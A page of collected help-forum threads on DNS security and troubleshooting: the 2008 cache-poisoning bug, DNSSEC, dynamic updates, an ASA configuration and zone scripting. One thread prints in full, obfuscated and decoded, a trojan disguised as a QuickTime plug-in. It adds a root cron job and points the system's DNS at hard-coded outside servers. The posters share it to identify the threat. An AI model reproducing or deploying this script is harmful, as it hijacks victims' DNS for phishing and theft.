DNS security - DDos

Similar Messages

• DNS security and  Dan Kaminski's bug?

  With the disclosure of Dan Kaminski's DNS security issue, has Apple announced their intentions on bug patching this?

  That's because you aren't an ISP. However, this issue can affect any DNS box running on OSX. It remains unpatched as of this writing, and it remains a threat. Sun, MS, Men&Mice, Redhat, SUSE -- they all had patches weeks ago. Apple? No. (oh, that's a quiet 'no').
  There are ISPs with Apple machines installed. Those machines represent a threat to the rest of the internet. A legal liability threat to those ISPs. And an embarrassment that every other major OS provider has both noted the problem and resolved it. Not Apple.
  Turn off recursion? That will help a bit. But this isn't some ******** little GUI bug or annoyance (as I usually post). It is a significant exploit that is known, out in the wild, and utterly unspoken of by our vendor here. It is a Problem. It is not something I can even get a 'we're aware of it and working on it' kind of reply from Apple.
  From this thread, do you think there might be reasons Apple doesn't penetrate the Enterprise, or why you perceive OSXS installs are only 'local Lans'?

• How to enable DNSSEC - DNS Security validation in Resolver

  Hi,
  I would like to set my Mac to use DNSSEC (request secure answers and perform validation of answers). Anybody have an idea how to configure this?
  I understand BIND 9 is in the OS but don't know how/if it ties into the name (DNS) resolver library which the apps (like Safari etc) use. I've realized that the usual UNIX style config files like /etc/named.conf and /etc/resolv.conf aren't really in use (see the Mac OS notices inside them).
  This originally started as the ISP (Rogers) started displaying their own ad ridden search page for mis-typed/non-existent domain names typed into the web browser address bar. There was an opt out, which I used, but then it started displaying a highly annoying copy of Internet Exploder's DNS error page. Lately they started redirecting my Safari default home page (when starting Safari or shiftcmdH) to their own website instead of what I've configured Safari with (I actually use the default http://livepage.apple.com/, call me lame . So much for net neutrality...
  DNSSEC may not solve this particular problem, since not all domains are secured anyways, but I'd like to try the option for other obvious reasons too.
  PS. I couldn't find a topic on this. Apologies if there is already a thread on this topic and please direct me there if you know of it.
  Cheers and hope you're having happy holidays!
  Thanks in Advance!

  If you want to report this issue to Apple's engineering, send a bug report or an enhancement request via its Bug Reporter system. To do this, join the Apple Developer Connection (ADC)—it's free and available for all Mac users and gets you a look at some development software. Since you already have an Apple username/ID, use that. Once a member, go to Apple BugReporter and file your bug report or enhancement request. The nice thing with this procedure over submitting feedback is that you get a response and a follow-up number; thus, starting a dialog with engineering.

• Dynamic DNS updates and issues with re-imaged / replaced machines with the same computer name

  Our AD team gets asked frequently to delete bad DNS entries because a computer was replaced or VDI was re-created, and when it was joined to the domain it had the same computer name but different SID, so the DNS entry for that computer can no longer be updated
  to a new IP address because the new computer doesn't have rights to update that object in DNS.
  I recently saw a resolution to this was to set the security for DNS to allow updates from "Domain Computers" as described in the KB below.
  http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2005210
  Has anyone done this?  Any negative implications from this?
  Thanks

  Granting all domain computers write access to all records in the dns zone does solve the problem. On the negative side, DNS security is reduced significantly. For example, any user with admin rights locally on his/her computer will be able to sabotage
  services in your domain by deleting or changing host records of domain controllers, servers or other client computers. 
  A more secure solution in this case will be configuring DHCP servers to update DNS on behalf of the client and granting DHCP servers appropriate access to DNS zone. Take a look at
  Configuring Secure Dynamic Update for more info.
  Gleb.

• DNS - is it necessary on a LAN?

  Hoping someone more advanced than I can help me out - I'm the defacto network admin for a small design shop and we currently have an Xserve G3 running Mac OS X Server 10.3 - I'm going through the Mac OS Server Essentials course (the book version, not the real taught-by-a-pro version -- we don't have that much cash on-hand!) but am by no means a newbie to the basics of networking.
  Our G3 currently handles simple file sharing only. Our DHCP services, DNS services and firewall are all handled by a Cisco PIX unit that's managed by an outside firm that's completely overcharging us to manage. Add to that, they haven't been able toget the VPN services in the PIX to actually work. So, long story short, I want to pull these services in-house to save costs and get rid of these yo-yos controlling my PIX, and resell the PIX. It's overkill for what we need.
  My question is this - After upgrading, I want to use my G3 Xserve to handle file sharing, DHCP addressing, and utilize the VPN services to access our network apps from outside (I Really really really want to work from home again!)... Do I need to establish DNS services on my LAN for this to work, or can I simply rely on an outside DNS and not enable the DNS services on my Xserve?
  We host only 1 website that's reachable exculsively by IP address via a link on an externally hosted site. Currently through the pix, this site is not reachable from our LAN (and that's OK - we have a back door to it that works just fine). Any response would be most appreciated. If more info as to IP addresses or specific configurations are needed, please email me directly at [email protected] I'd prefer to keep that info off the boards.
  Thanks in advance!

  I agree with Jim Pattison's overall suggestion that you don't need an internal DNS server in most cases for a small office configuration (or small home office, for that matter). Your ISP will provide DNS resolvers for getting at hosts on the Internet, and if your ISP hosts your domain, they'll provide DNS hosting services for any Internet-visible servers you wish the world to know about.
  Where local DNS services comes in handy (and it's important to make the distinction between DNS serving and DNS resolving), is if you:
  1) Want the ability to refer to your local printers, workstations, or servers by name, such as "office-printer" or "berts-mac", or "mail-server", etc., without knowing numeric addresses or using the ".local" convention that works sometimes, but not always, on the Mac.
  2) If you want to enable Kerberos authentication under Open Directory, then it's vital that the OD Master and all of its replicas have working forward and reverse DNS definitions. By 'working' I mean that the forward DNS of each server name matches its IP address, and the reverse DNS of that address matches the server name. Kerberos won't work without matching forward and reverse DNS.
  3) Portable home directories, and other advanced network services won't work unless forward and reverse DNS is defined for the OS X servers. I'm not sure why that is the case, but I do know it is required.
  If your OS X servers are on Internet-visible IP addresses, then their forward DNS can be made part of the DNS definitions your ISP provides. Whether or not your ISP will define matching reverse DNS is another matter -- the better ISPs will provide reverse DNS for your servers. If you run an Internet-visible mail server, for example, then it's important for the rest of the world to see matching forward and reverse DNS definitions or many mail servers will reject your mail thinking you're a spammer.
  If your OS X servers are on internal IP addresses -- like 192.168.., 10..*., 172..*. -- then you need to have one or more OSX Servers (or other servers) providing forward and reverse DNS if you want to take advantage of any of the advanced server features mentioned earlier.
  A DNS CASE STUDY
  At my company, we have a public domain hosted by our ISP (call it mydomain.com). In addition to DNS hosting for that domain, they also provide a couple of DNS resolvers we can point our workstations at. We have two OS X Servers on internal IP addresses 192.168.1.100 and 192.168.1.102 running DNS services -- one is the master and one is a slave. We opted to do DNS programming directly in BIND, which means manually editing the /etc/named.conf file, rather than relying on the graphic front end in Tiger Server Admin. This is simply because we wanted to do more advanced things than you could define via the Server Admin front end.
  Our DNS definitions basically provide for:
  1) Forward DNS for a local.mydomain.com domain to provide names for systems on our LAN. This is where the OS X servers reside -- server1.local.mydomain.com resolves to 192.168.1.100 and server2.local.mydomain.com resolves to 192.168.1.102.
  2) Reverse DNS for the 192.168.0.*, 192.168.1.* and 192.168.2.* address ranges. 192.168.1.100 resolves to server1.local.mydomain.com and 192.168.1.102 resolves to server2.local.mydomain.com.
  3) DNS forwarding, so that if you ask about anything not defined by our forward and reverse DNS zones (like discussions.apple.com, for example), our DNS resolvers pass the request to our ISP rather than try to resolve and cache the answer ourselves. This significantly improves performance, as the ISP can answer our queries much faster than we can perform the lookups starting with the root servers ourselves. This is purely a performance issue.
  4) DNS security -- Only folks on our 192.168.. local area network can ask about the local.mydomain.com domain. It's not visible outside our local network, thus improving security.
  5) Since our servers have matching forward and reverse DNS addresses on the local.mydomain.com domain, we can make use of Kerberos authentication, portable home directories, and so on. These don't work unless your OS X servers have matching forward and reverse DNS -- regardless of who provides the DNS services.
  DNS / BIND RESOURCES
  I based our /etc/named.conf on an excellent article I found online at <http://www.zytrax.com/books/dns/ch6/>. I also recommend O'Reilly & Associates "DNS & Bind" book -- <http://www.oreilly.com/catalog/dns4/index.html>. This is a good way to learn how to build DNS servers.
  If folks are curious, I can post our /etc/named.conf file.
  Xserve G4   Mac OS X (10.4.6)   1GB RAM

• Mobile Challenge 4/8/2013 – 4/19/2013

  MOBILE CHALLENGE CONTEST INFORMATION
  This Contest opens on February 11th, 2013 with a new challenge every two weeks until July 31st  2013.
  Which of these statements is not correct about Cisco ACE appliance?
  A.  Has features like hardware based compression, Flash Forward and SSL acceleration.
  B.  Has Role Based Access Control (RBAC) and supports upto 250 virtual devices with failover.
  C.  Provides layer 4 and 7 content switching, application security and protection from DNS based DDoS attacks.
  D.  Consolidates data center by reducing the neumber of servers and load balancers required.
  CONTEST RULES: How to Enter
  MOBILE CHALLENGE CONTEST INFORMATION
  Step 1: Download and register on the Cisco Technical Support Mobile App on your mobile device. If you are already a registered member of the  Cisco Technical Support Mobile App, please skip Step 1 and go to Step 2.
  Step 2: To participate in this challenge, Login and go to Browse Communities  under Support Community. Then find Online Tools and Resources > Cisco  Technical Support Mobile Apps > Mobile Challenge MM/DD/YYYY.  All  challenges will be named Mobile Challenge followed by the start date.
  Step 3: Post your response to the challenge question using the mobile app by the end date.
  Note:  To post your response, click on Reply from the Action menu. On iOS, the  Action menu is available from the Action button on the top right of the  page and on Android the Action overflow in the Action bar displays the  Reply option.
  The winner will be announced on 4/22/2013.
  JUDGING CRITERIA. 
  All  entries marked with correct answers, received during the Mobile  Challenge Period above will be entered into a bi-weekly random drawing  where the winner will be selected by a representative of Sponsor from  among all eligible entries received.  The drawing will be held at the  end of each contest period during the challenge Period.
  The Sponsor’s decision will be final in all matters.  Odds of winning depend on the total number of eligible entries received by the Sponsor.
  For full rules and eligibility please visit the official contest rules page.
  Message was edited by: CISCO MODERATOR

  Tricky...
  My guess is B.
  The ACE Appliance does not support 250 virtual devices, that looks more like the ACE module for Cat6K
  Thanks,
  Johan
  Sent from Cisco Technical Support iPad App

• Asa 5505 problems

  pbm with asa5505.For 45 min-1h &later on internet is down.any solution
  hostname DarrkoEOOD
  domain-name default.domain.invalid
  enable password my encrypted
  names
  interface Vlan1
  nameif inside
  security-level 50
  ip address 89.x.x.65 255.255.255.192
  interface Vlan2
  nameif Evrokom
  security-level 90
  ip address 89.x.x.66 255.255.255.252
  interface Vlan3
  description Evrocom-DNS_Blackhole
  nameif DNS
  security-level 0
  ip address 10.0.0.1 255.255.255.252
  interface Ethernet0/0
  description LAN
  interface Ethernet0/1
  description Evrokom
  switchport access vlan 2
  interface Ethernet0/2
  description Evrocom-DNS_Blackhole
  switchport access vlan 3
  interface Ethernet0/3
  interface Ethernet0/4
  interface Ethernet0/5
  interface Ethernet0/6
  interface Ethernet0/7
  passwd my encrypted
  ftp mode passive
  clock timezone EEDT 2
  clock summer-time EEDT recurring last Sun Mar 3:00 last Sun Oct 3:00
  dns server-group DefaultDNS
  domain-name default.domain.invalid
  same-security-traffic permit inter-interface
  same-security-traffic permit intra-interface
  access-list IPSAllowedOutsideInterface extended permit ip host 71.169.2.10 any
  access-list IPSAllowedOutsideInterface extended permit ip host 72.89.63.208 any
  access-list IPSAllowedOutsideInterface extended permit ip 69.64.222.0 255.255.255.0 any
  access-list IPSAllowedOutsideInterface extended permit ip host 77.85.217.18 any
  access-list IPSAllowedOutsideInterface extended permit ip host 62.204.140.9 any
  access-list IPSAllowedOutsideInterface extended permit tcp 213.226.0.0 255.255.0.0 any eq ssh
  access-list IPSAllowedOutsideInterface extended deny tcp any any eq 3389
  access-list IPSAllowedOutsideInterface extended deny tcp any any eq ssh
  access-list IPSAllowedOutsideInterface extended permit ip any any
  pager lines 24
  logging timestamp
  logging buffer-size 1048576
  logging buffered debugging
  logging asdm informational
  mtu inside 1500
  mtu Evrokom 1500
  mtu DNS 1500
  no failover
  icmp unreachable rate-limit 1 burst-size 1
  icmp permit any inside
  icmp permit any Evrokom
  asdm image disk0:/asdm-522.bin
  no asdm history enable
  arp timeout 14400
  global (Evrokom) 10 interface
  nat (inside) 10 89.215.168.64 255.255.255.192
  access-group IPSAllowedOutsideInterface in interface inside
  access-group IPSAllowedOutsideInterface out interface inside
  access-group IPSAllowedOutsideInterface in interface Evrokom
  access-group IPSAllowedOutsideInterface out interface Evrokom
  route Evrokom 0.0.0.0 0.0.0.0 89.215.174.65 1 track 1
  route Evrokom 217.9.224.2 255.255.255.255 89.215.174.65 1 track 2
  timeout xlate 3:00:00
  timeout conn 1:00:00 half-closed 0:20:00 udp 1:00:00 icmp 0:00:05
  timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
  timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
  timeout uauth 0:05:00 absolute
  username admin password rj3RJA7.tmoyw8bB encrypted privilege 15
  username thegrave password my encrypted privilege 15
  aaa authentication ssh console LOCAL
  http server enable
  http 62.x.x.9 255.255.255.255 Evrokom
  http 213.x.x.0 255.255.255.0 Evrokom
  no snmp-server location
  no snmp-server contact
  snmp-server enable traps snmp authentication linkup linkdown coldstart
  service resetinbound interface inside
  track 1 rtr 1 reachability
  track 2 rtr 2 reachability
  telnet timeout 5
  ssh 72.x.x.208 255.255.255.255 Evrokom
  ssh 213.x.x.0 255.255.0.0 Evrokom
  ssh 67.x.x.39 255.255.255.255 Evrokom
  ssh 62.x.x.9 255.255.255.255 Evrokom
  ssh 77.x.x.18 255.255.255.255 Evrokom
  ssh timeout 5
  ssh version 2
  console timeout 0
  dhcpd lease 32000
  dhcpd address 89.x.x.66-89.215.168.125 inside
  dhcpd dns 217.x.x.2 212.39.90.42 interface inside
  dhcpd enable inside
  ntp server 129.6.15.29 source Evrokom
  ntp server 129.6.15.28 source Evrokom prefer
  prompt hostname context
  Cryptochecksum:xxx
  : end

  Use this Cisco ASA 5500 Series Adaptive Security Appliances Troubleshoot and Alerts
  http://www.cisco.com/en/US/products/ps6120/tsd_products_support_troubleshoot_and_alerts.html

• How to manage IP address assignment for laptops?

  Dear All,
  I'm looking for an efficient way to manage IP address assignment for laptops.
  I have a DHCP server with reservation for all my devices.
  Laptops usually have 2 NICs: LAN and WiFi card.
  So, how can I manage the IP assignment for these devices?
  If I make a DHCP reservetion with two different IP addresses, I can have problems with DNS round-robin.
  Should I enable the DNS secure dynamic update for domain members and then reserve two different IP addresses on DHCP?
  I don't want that user needs to manually change their NIC configuration.
  What you suggest?
  Thanks

  The best way to manage it would be to "not" manage it.  DHCP by definition is supposed to be "dynamic".  DHCP Reservations are great for a few devices that live under "special circumstances" but you never want to set Reservations for everything,...if
  you do that then just don't have DHCP to start with and statically assign everything.
  The combination of DHCP with dynamically updated DNS in AD means you never have to know or ever care what the IP# is.  Everything is referred to by it's hostname.
  Some things to keep in mind:
  Every interfaces has a different MAC,...meaning the Laptops have two MACs. Therefore it is impossible to reserve the same IP# for both. So they end up with a different IP# depending on which Nic they use.  Running two laptop nics on the same LAN at
  the same time is always bad.  Either always use the wireless,...or always turn off the wireless nic when laptops are local within your facility and can use the physical nic.   In other words pick one,...or the other,...never allow both to work
  at the same time.  This is a responsibility and education issue of the user,...you can't do this for them.
  User can not change their own network IP Specs unless they are Local Administrators on their machines,...and they should never be allowed to be Local Administrators.

• HT1296 Comcast does not allow me to use iCloud to sync my iPhone.  An apple genius gave me a special DNS server to allow syncing.  That did not work at home.  So I used a secure proxy server outside the US, and then was able to sync.

  Comcast claims that are not blocking ports.  Technically from what I understand they are not.  They just don't recongnize the iCloud server address on their DNS.  An Apple Genius gave me a "free access DNS" which they use in the Oakrigde store to sync to iCloud.  It works great in the store with my computer and iPhone but not at home.  After a comversation with an IT person in Germany he explained that due to the limited number of ports available and the almost infitinite appetite for ports companies often choose to manage the number of ports avialable for use by their customers.   What did work for me was to use a secure proxy server with secure encoding.  It works great!  However as the cloud does seem to go down from time to time I would prefer to also have the USB cable option for syncing. 

  This does not make sense. If comcast blocked iCloud.com there would be millions of posts here about it, as comcast is one of the largest ISPs in the US. Most likely you have DNS settings messed up in your router or your computer. Ports and DNS have nothing to do with each other. A "port" is just part of a complete URL. Using a port does not have any affect on the ISP, who doesn't even see the port in the packet.

• ClamAV and DNS Failure with Security Update 2010-005

  Hey everyone, got a bit of an issue.
  I'm running Leopard Server 10.5.8 and I've noticed a very odd issue with the latest security update, (2010-005).
  Since the update, whenever ClamAV goes out to check for new definitions and database updates, all of my DNS clients lose connection during the few minutes that it's working. I've verified this by watching the logs as the updates happen. Everything is fine, and the second that ClamAV starts running, DNS fails on all the clients, then starts again after the update process.
  Anyone else notice this? And more importantly, how should I go about disabling ClamAV, since I don't run a mail server off this particular server.
  Thanks!

  The System Info below your post indicates that you are running OS X 10.5.8. The FaceTime Beta requires a minimum of OS X 10.6.4.

• How do I remove Comodo Secure DNS in Firefox? It keeps interferring with and stops me going to websites I want to see.

  I originally installed Comodo as a Firewall but then uninstalled it as I found it very annoying with the Comodo Secure DNS redirecting and stopping me going to websites I choose to go to ... the last time was for weebly.com. The firewall uninstalled OK but the Secure DNS is still active and I can't find where to disable it and remove the code.

  Hello mirth27, seek if exist something from comodo in Start > Control Panel > Programs > Programs and Features, and remove it.
  then you can seek in [http://en.wikipedia.org/wiki/Windows_Registry registry] to delete everything related to comodo, Start > type '''regedit''' into the search area > hit enter > click Yes if prompted by UAC . You are now in registry editor, go to File > Export , to make a copy of your registry in a case something goes wrong, the go to Edit > Find > type '''comodo''' and you have all the keys the program created and not deleted by uninstalling the comodo firewall, now you have to delete every key related to comodo............'''not so easy''' i think !
  http://windows.microsoft.com/en-us/windows/back-up-registry#1TC=windows-7
  thanks again

• Security issue in DNS ! Update bind.

  Apparently there is a massive security issue in DNS protocol : http://securosis.com/2008/07/08/dan-kam … -released/
  or http://www.kb.cert.org/vuls/id/800113
  I am surprised I haven't seen any post on the forum about it. For now a solution could be to update bind to 9.5.0-P1 (I don't know if the one in testing is this particular one, there is no "P1").
  Every DNS server has to be upgraded since the issue is in the protocol, not in the code !

  A lot of systems got updated yesterday/today. I just checked a Windows Server 2003 x64 RC2 at work; yesterday it was vulnerable, but today it's reported safe after the recent security updates (this site offers some kind of check: http://www.doxpara.com/)
  I believe all the "big" ones in Linux did release an update yesterday, so there's probably plentiful of patches around... which is beyond the limits of my brain cells at the moment.

• Odd DNS problems with wireless using WPA security.

  My partner and I have two Macbooks, hers is the white 1.83Ghz and mine is the white 2.0Ghz. The 1.83 with the latest updates (10.4.8) connects just fine and browses fine, no issues what-so-ever. My 2.0Ghz (also on latest update 10.4.8) does connect through WPA as well, but fails to browse with what appears to be DNS failures.
  The console spews out messages like "mDNSResponder: Repeated transitions for interface en1 (192.168.2.102); delaying packets by 5 seconds"
  Repeated refreshes of the browsers (Safari and Firefox) have mixed responses but mostly just timeout trying to connect to anything.
  I have tried all the tricks that I have heard about, including reinstalling OS X from scratch (wiping out the disk), removing the preferred connections, removing keychains, deleting the ~/Library/Preferences/com.apple.internet... files etc. All with no appearant change.
  The machine connects just fine and browses fine with no security or WEP set on the router. Just seems to be related to WPA. The router does not support WPA2 so I cant test that. I have tried 'nslookup' and 'host' in the terminal and get mixed responses. Sometimes it looks up quickly and fine, all the while the browser is timing out in the background on the same host name. Other times those commands also timeout with messages like:
  ;; connection timed out; no servers could be reached
  The /etc/resolv.conf shows the nameserver to be 192.168.2.1 (my router) which is correct as it is the same on the other macbook and windows machines. I did, however, try setting the DNS servers manually to my ISPs servers in the Network Preferences but this made no difference. It is bazaar that two macbooks with what I believe to be identical OS and updates (10.4.8) can have such different results. It is definitely related to WPA, but how it is broken and why I don't know - but it appears to me to be DNS related because pinging and browsing to IP addresses presents no problems.
  Any tips on things I can try next would be most helpful. Thanks, Chad.
  Macbook 2.0Ghz C2D (white)
    Mac OS X (10.4.8)  

  Yes, same problem here since the Airport update.
  Used to have trouble reconnecting after sleep but I solved that problem by deleting then reseting my "Preferred Network" setting.
  But since the update the MacBook just loses the connection to the internet. It seems to stay connected to the router (Linksys) and can see my iMac on Bonjour but not Internet connectivity.
  On your clue, I disabled WPA and it hooked right up and seems to be working fine.
  Now I just have to wait and see if it loses the connection spontaneously over the next few hours.
  I don't know why one of your MacBooks is working and the other isn't. Were they both updated last week with the Airport update?
  Intel 20" iMac + MacBook 2.0   Mac OS X (10.4.7)   Cube 450 G4

• QT Plugins mucking with DNS servers via scutil? Possible security issue?

  Does anyone know why I would have a QuickTime.xpt file that needs to be run as root via 'cron' every minute?
  (* * * * * \"/Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1)
  The script itself is looks up 'PrimaryService' ID in State:/Network/Global/IPv4 and then creates entries for State:/Network/Service/<PrimaryServiceID>/DNS for 2 server addresses.
  The current value of these addresses is:
  85.225.113.141 c-8d71e155.11-500-64736c10.cust.bredbandsbolaget.se
  85.225.112.232 ua-85-225-112-132.cust.bredbandsbolaget.se.
  The other 'flakey' thing about this script is that it's crudely encrypted via:
  #!/bin/sh
  x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aaw.asa;s2=cx.zxx.aaz.zwz;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
  #!/bpf/oy
  daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
  PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
  Which translates to:
  #!/bin/sh
  path="/Library/Internet Plug-Ins"
  PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
  open
  get State:/Network/Global/IPv4
  d.show
  quit
  EOF
  /usr/sbin/scutil << EOF
  open
  d.init
  d.add ServerAddresses * $1 $2
  set State:/Network/Service/$PSID/DNS
  quit
  EOF
  exist=`crontab -l|grep QuickTime.xpt`
  if [ "$exist" == "" ]; then
  echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
  crontab cron.inst
  rm -rf cron.inst
  fi
  rm -rf "$0"
  I am apparently not the only one who has seen this, but no one has posted anything definitively about what this came from, and why it is there. I'm inclined to both delete the script and remove the crontab entry, but want to make sure that some obscure Quicktime or other plug-in doesn't require it. I suspect that the "QuickTime.xpt" name is a smoke screen to make the unaware user THINK that it is an Apple specified file.
  This may not be posted in the proper forum, so I will be reposting it under Networking and Mac OSX Leopard, since I've only seen it on my 10.5 system. (Hmmm. Shouldn't there be a security section somewhere?)

  Duh! Never mind.
  Took me less time to check the net via Google and determine it's a known 'trojan' attempt, than it took me to type up the question intelligently.
  Well, at least it's now on Record in the Apple forums somewhere. Moderators, feel free to delete these two posts, or move them to the most appropriate forum.
  "In OS X 10.5, your DNS entries will be altered to point to a malicious server to handle further requests. This can be disastrous if you are using Paypal, your online bank controls, or any other heavily phished targets."
  Of course, it is only spurious, since a look at my routing table has never shown it pointing to these two servers. Might be the cause of some intermittent problems, but haven't seen any problems.
  Time to change passwords just in case.

• Windows Server 2008 DNS command syntax to set All zones to Dynamic Secure updates

  Hello,
  Am I trying to configure all of my 150 dns zones to  dynamic updates from "none" to "secure"
  What is the command I should run to update all my zones. I ran "dnscmd myservername /config ALLZones /AlowUpdate 1"  and I keep on receiving this error message
   "DNS_ERROR_ZONE_DOES_NOT_EXIST"
  What should be the exact command/argument I should run to propagate this on all my zones ?
  is "..allzones" or "allzones"  a valid argument ?
  Thanks
  Robert

  Hi Robert,
  Even add the two dots, I also get the same result.
  Here is the screenshot of my lab,
  As Kumar has mentioned, you need to write a script.
  I have tried to modify the script provided by Kumar. It works on my lab server.
  Here is the script,
  $a = get-dnsServerZone
  foreach ( $zone in $a)
  if ($zone.ZoneType -eq "Primary")
  if ($zone.IsDsIntegrated -eq "True")
  { set-dnsServerPrimaryZone -DynamicUpdate Secure -ZoneName $zone.zonename }
  Best Regards.
  Steven Lee
  TechNet Community Support